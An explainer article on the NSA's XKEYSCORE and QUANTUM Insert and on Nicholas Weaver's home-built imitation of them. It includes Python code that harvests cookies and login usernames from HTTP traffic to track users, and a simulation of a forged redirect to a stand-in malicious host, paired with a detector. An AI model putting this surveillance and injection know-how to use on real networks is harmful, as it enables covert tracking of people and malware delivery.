You may have heard of Edward Snowden, the NSA contractor turned whistleblower, and the surveillance documents he leaked exposing how the agency monitors people around the world. One of the programs those documents describe is XKEYSCORE, a massive system for vacuuming up and sifting through emails, chats, images, search terms and other personal data pulled from the core of the internet (the backbone).
What is the NSA XKEYSCORE Program?
The NSA calls it its ‘widest-reaching’ system. Established in 2008, it runs on more than 1000 servers that store and index traffic taken from the internet backbone. Analysts pull out data about particular users by searching for patterns and connections in what is stored on those servers, such as an email address, a cookie or an IP address.
How does their Surveillance program work?
The NSA’s super-secret surveillance system in fact works very much the way an off-the-shelf intrusion detection system (IDS) does. In such a system, when packets arrive from the network, a high-volume filter separates uninteresting traffic from traffic worth inspecting and passes the latter to a load balancer, which spreads it across a number of servers; in an IDS deployment those servers are the network intrusion detection nodes. The nodes parse the traffic, decide whether it is benign or malicious, and act on that decision, for example by blocking the traffic and issuing an alert to administrators.
Following the same general design, Nicholas Weaver, a computer scientist at UC Berkeley, built a home-grown surveillance system in less than a week. To approximate the filter and load balancer he used OpenFlow, a protocol for programming how switches and routers forward traffic. For the intrusion detection layer he used the Bro Network Security Monitor (since renamed Zeek), an open-source framework developed by Vern Paxson, a fellow computer scientist at UC Berkeley. He had to write scripts to extract cookies from web traffic and parse usernames out of it, but that was minimal work.
Those looking to do more robust backbone monitoring and data parsing, as the NSA does, could opt instead for Vortex, an IDS that the US defense contractor Lockheed Martin developed and released for free on GitHub. Weaver thinks, in fact, that the NSA’s XKEYSCORE probably began its life as Lockheed Martin’s Vortex, based on the XKEYSCORE features described in the Snowden documents.
With Weaver’s DIY system, searching the collected data meant running local searches. Someone who wants broader, federated searches could use Hadoop, an open-source framework for storing and processing large amounts of data spread across many machines. Hadoop can partition the parsed data into so-called buckets so that processing and searching touch only the data they need. For example, IP addresses can be parsed out and indexed in one bucket, while cookies and usernames go into other buckets. To find, say, every IP address that visited a certain web page, a search need only look at the IP bucket. “Hadoop will allow me to search all the data [simultaneously], but most of my searches actually only need to look at a couple of buckets,” Weaver says.
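The three stages just described (the flow-aware load balancer from the IDS analogy, the per-node scripts that pull cookies and usernames out of HTTP, and the bucketed index that answers “which IPs visited this page”) fit in one toy pipeline. The block below is an added example written for this page; it is not Weaver’s Bro scripts, Lockheed Martin’s Vortex or a Hadoop job. The HTTP requests, IP addresses (RFC 5737 documentation ranges) and hostnames are constructed, and the login form field names it looks for are an assumption.

```python
"""Toy collect-parse-bucket pipeline in the shape described above.

Added example for this page; not Weaver's Bro scripts, Vortex or Hadoop.
Sample requests, addresses and hostnames are constructed.
"""
import hashlib
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample: (client IP, server IP, raw HTTP request) as a tap might
# reassemble them. The same session cookie shows up from two client IPs.
SAMPLE_REQUESTS = [
    ("192.0.2.5", "198.51.100.10",
     b"GET /news HTTP/1.1\r\nHost: example.com\r\nCookie: sid=abc123; lang=en\r\n\r\n"),
    ("192.0.2.7", "198.51.100.10",
     b"POST /login HTTP/1.1\r\nHost: example.com\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     b"username=alice&password=hunter2"),
    ("203.0.113.9", "198.51.100.10",
     b"GET /news HTTP/1.1\r\nHost: example.com\r\nCookie: sid=abc123\r\n\r\n"),
    ("192.0.2.7", "198.51.100.20",
     b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n"),
]

def assign_node(client_ip, server_ip, n_nodes):
    """Load-balancer step: hash the unordered IP pair so both directions of a
    flow land on the same IDS node (per-packet round robin would split them)."""
    key = "|".join(sorted((client_ip, server_ip))).encode()
    return int.from_bytes(hashlib.sha256(key).digest()[:4], "big") % n_nodes

def parse_request(client_ip, raw):
    """IDS-node step: pull IP, URL, cookies and a login name out of one request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for pair in headers.get("cookie", "").split(";"):
        name, _, value = pair.strip().partition("=")
        if name:
            cookies[name] = value
    username = None
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        form = parse_qs(body.decode("latin-1"))
        for field in ("username", "user", "login", "email"):  # assumed field names
            if field in form:
                username = form[field][0]
                break
    return {"ip": client_ip, "url": headers.get("host", "") + path,
            "cookies": cookies, "username": username}

def build_buckets(records):
    """Hadoop-style bucketing: one index per selector type, so a query reads
    only the bucket it needs instead of every stored record."""
    buckets = {"ip": defaultdict(set), "cookie": defaultdict(set),
               "username": defaultdict(set)}
    for rec in records:
        buckets["ip"][rec["ip"]].add(rec["url"])
        for name, value in rec["cookies"].items():
            buckets["cookie"][(name, value)].add(rec["ip"])
        if rec["username"]:
            buckets["username"][rec["username"]].add(rec["ip"])
    return buckets

def ips_that_visited(buckets, url):
    """'Every IP address that visited a certain web page': IP bucket only."""
    return sorted(ip for ip, urls in buckets["ip"].items() if url in urls)

def ips_sharing_cookie(buckets, name, value):
    """A session cookie seen from several IPs ties those IPs to one user."""
    return sorted(buckets["cookie"].get((name, value), ()))

def run_pipeline(requests=SAMPLE_REQUESTS, n_nodes=4):
    """Filter/balance -> parse on the assigned node -> merge into buckets."""
    per_node = defaultdict(list)
    for client_ip, server_ip, raw in requests:
        node = assign_node(client_ip, server_ip, n_nodes)
        per_node[node].append(parse_request(client_ip, raw))
    records = [rec for node in sorted(per_node) for rec in per_node[node]]
    return build_buckets(records)

if __name__ == "__main__":
    b = run_pipeline()
    print("visited example.com/news:", ips_that_visited(b, "example.com/news"))
    print("share cookie sid=abc123:", ips_sharing_cookie(b, "sid", "abc123"))
    print("logged in as alice from:", sorted(b["username"]["alice"]))
```

The cookie bucket is the part worth noticing: the `sid` value seen from two different client addresses is exactly the kind of selector that lets an analyst follow one person across networks without ever seeing a name, which is why the cookie and username buckets are kept separate from the IP bucket rather than folded into it.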
Advanced, Targeted Spying
Weaver’s surveillance setup isn’t complete without a way to conduct targeted surveillance. Bulk collection is about finding needles in a haystack: the few data points among billions that merit further scrutiny. Once spies home in on those, they need more efficient and pinpointed intelligence-gathering, and they get it by hacking the target’s system. The NSA and its British partner GCHQ use a system called QUANTUM Insert, a man-on-the-side attack combined with code injection. The injector watches the target’s browser request a web page and races the real server with a forged response; because the forged packet arrives first, the browser is sent to a malicious page instead, where malware is silently downloaded to the target’s computer.
The spy agencies used QUANTUM Insert to hack into the machines of terrorist suspects in the Middle East as well as the machines of employees working for the Belgian telecom Belgacom.
Weaver’s low-rent alternative for malware injection is to use the built-in injection capabilities in Bro. Someone could also use AirPwn, a tool hackers have long used as a prank to hijack someone’s browser and display porn or other raunchy images on it. “This is an old technique; it’s used for jokes,” Weaver says.
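The race described under QUANTUM Insert above, and the injection that Bro or AirPwn would perform in Weaver’s setup, comes down to TCP sequence-number bookkeeping: whichever response reaches the client first with the expected sequence number is accepted, and the genuine one is then discarded as a duplicate. The block below is an added example for this page, not NSA/GCHQ code, Bro’s injection feature or AirPwn. It reduces TCP to that bookkeeping, constructs the addresses and HTTP messages, and assumes the injector already learned the server’s next sequence number from the handshake. It also shows the check a defender can run: a real retransmission repeats the same bytes, so two segments on one flow with the same sequence number but different payloads are the fingerprint of a man-on-the-side injection.

```python
"""Man-on-the-side injection, QUANTUM Insert style, and one way to detect it.

Added example for this page; not NSA/GCHQ code, Bro's injection feature or
AirPwn. TCP is reduced to sequence-number bookkeeping; addresses, ports and
HTTP messages are constructed.
"""
import hashlib
from dataclasses import dataclass

@dataclass(frozen=True)
class Segment:
    src: str        # "ip:port"
    dst: str
    seq: int        # stream offset of the first payload byte
    ack: int
    payload: bytes

class ClientSocket:
    """Receive side of the browser's connection: accepts in-order data only,
    so whichever response wins the race is the one the browser renders."""
    def __init__(self, rcv_nxt):
        self.rcv_nxt = rcv_nxt
        self.received = []
    def deliver(self, seg):
        if seg.seq != self.rcv_nxt:      # late duplicate / out of window: dropped
            return False
        self.rcv_nxt += len(seg.payload)
        self.received.append(seg.payload)
        return True

def forge_response(request, server_next_seq, redirect_to):
    """Injector on the side: it saw the request (and earlier the handshake that
    fixed the server's sequence space), so it can craft a reply the client will
    accept before the real one arrives."""
    body = ("HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\n\r\n"
            % redirect_to).encode()
    return Segment(src=request.dst, dst=request.src, seq=server_next_seq,
                   ack=request.seq + len(request.payload), payload=body)

class DuplicateSegmentDetector:
    """Passive monitor: alert when one flow carries two data segments with the
    same sequence number but different payloads (a genuine retransmission
    repeats identical bytes and stays silent)."""
    def __init__(self):
        self.seen = {}
        self.alerts = []
    def observe(self, seg):
        if not seg.payload:
            return False
        key = (seg.src, seg.dst, seg.seq)
        digest = hashlib.sha256(seg.payload).hexdigest()
        if key in self.seen and self.seen[key] != digest:
            self.alerts.append(key)
            return True
        self.seen.setdefault(key, digest)
        return False

CLIENT, SERVER = "192.0.2.5:51234", "198.51.100.10:80"   # constructed
SERVER_NEXT_SEQ = 5000   # assumed: learned by the injector from the handshake

def simulate(inject):
    """Replay one request/response on the wire, with or without an injector."""
    request = Segment(CLIENT, SERVER, seq=1000, ack=SERVER_NEXT_SEQ,
                      payload=b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
    legit = Segment(SERVER, CLIENT, seq=SERVER_NEXT_SEQ,
                    ack=request.seq + len(request.payload),
                    payload=b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello")
    wire = [request]
    if inject:
        wire.append(forge_response(request, SERVER_NEXT_SEQ,
                                   "http://malicious.example/"))
    wire.append(legit)   # the real server is farther away, so it answers last

    client = ClientSocket(rcv_nxt=SERVER_NEXT_SEQ)
    monitor = DuplicateSegmentDetector()
    for seg in wire:
        monitor.observe(seg)
        if seg.dst == CLIENT:
            client.deliver(seg)
    return client.received, monitor.alerts

if __name__ == "__main__":
    for inject in (False, True):
        received, alerts = simulate(inject)
        print("inject=%s browser got %r, alerts=%r"
              % (inject, received[0].split(b"\r\n")[0], alerts))
```

Two caveats a practitioner would want. The injector only wins if its packet physically beats the server’s, which is why the attacker sits close to the target (a cafe access point, or an agency tap near the victim’s ISP), and a production detector has to handle partial overlaps and reassembly rather than the exact-seq match used here. And the trick only yields a useful payload on plaintext HTTP: on TLS the injector can still forge a TCP reset, but it cannot produce a record the browser will accept, which is the practical reason HTTPS everywhere blunts this class of attack.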
The Anywhere, Anyone Spy
Weaver notes that his surveillance system can actually be made more compact and portable by using off-the-shelf ARM/Wi-Fi embedded systems, which would be perfect for nation-state spies looking to target government workers. The spies could easily take the system to a Starbucks frequented by State Department employees, lawmakers or military personnel and use it to extract metadata belonging to customers who use the cafe’s wireless network. The metadata can help identify targets worthy of further surveillance, who can then be tracked online after they’ve left Starbucks, through this and other metadata. Such a system could easily be disguised as a plug-in air freshener inserted into an electrical outlet, Weaver notes. It could also be designed to erase itself automatically if someone unplugs it from the socket to examine it.
“Any foreign intelligence agency could install surveillance devices in every downtown DC Starbucks, use bulk surveillance to identify all the network visitors and, for any visitor who meets their criteria, directly inject exploits into their web browsing,” Weaver wrote in a blog post last year about his system. “DC hotels are similarly vulnerable to slightly larger installations such as my demonstration box…. We need to act like every open wireless network or hotel in the Washington area is potentially compromised. And with the low cost of such installation, it doesn’t even need to remain the realm of foreign intelligence services.”